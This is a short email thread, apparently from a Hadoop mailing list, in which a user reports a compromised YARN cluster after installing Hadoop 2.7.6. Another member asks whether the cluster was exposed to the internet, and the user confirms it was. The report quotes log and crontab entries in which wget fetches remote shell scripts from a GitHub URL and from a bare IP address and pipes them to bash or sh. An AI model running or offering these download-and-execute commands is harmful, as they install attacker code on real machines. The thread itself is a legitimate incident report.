Hi Sandeep,
short answer to your question. Yes, unfortunately.
Mit freundlichen Grüßen / Kind regards,
Cliff Mattern
Am 05.07.2018 um 21:14 schrieb Sandeep Nemuri:
Is this cluster open to internet? we've seen few clusters which are
open to internet are affected to this attack.
On Thu, Jul 5, 2018 at 8:32 PM Cliff Mattern
<[email protected]
<mailto:[email protected]>> wrote:
Dear all, we downloaded
http://www.apache.org/dyn/closer.cgi/hadoop/common/hadoop-2.7.6/hadoop-2.7.6.tar.gz
and install the unpacked files as described. The md5 check was
correct. After few days we found in the log files of YARN
following entries: 2018-06-29 05:37:21,490 INFO
org.apache.hadoop.yarn.server.resourcemanager.amlauncher.AMLauncher:
Command to launch container container_1530169168373_1580_01_000001
: wget -q -O -
https://raw.githubusercontent.com/zzgamond1/mygit/master/zz.sh |
bash ... 2018-06-29 05:39:54,152 INFO
org.apache.hadoop.yarn.server.resourcemanager.amlauncher.AMLauncher:
Command to launch container container_1530169168373_1583_01_000001
: wget -q -O -
https://raw.githubusercontent.com/zzgamond1/mygit/master/zz.sh |
bash & disown In the crontab we found following single entry: * *
* * * wget -q -O - http://46.249.38.186/cr.sh | sh > /dev/null
2>&1 We installed hadoop 2.7.6 on two seperate machines and get
the same behaviour. This all looks like a trojaner is working.
What do you say to this issue?
Mit freundlichen Grüßen / Kind regards,
Cliff Mattern
--
Clifford Mattern
AlphaCarina Software GmbH
Taunusturm 18.OG
Taunustor 1
60310 Frankfurt am Main
Tel.: +49 (0)69 24 43 42-4395
Fax: +49 (0)69 24 43 42-4150
e-Mail:[email protected]
<mailto:[email protected]>
Internet:https://alphacarina.de/
HRB Nr. 2339 • Handelsregister Deggendorf
Geschäftsführer: Dipl.-Inf. Stephan Iglhaut
--
* Regards*
* Sandeep Nemuri*
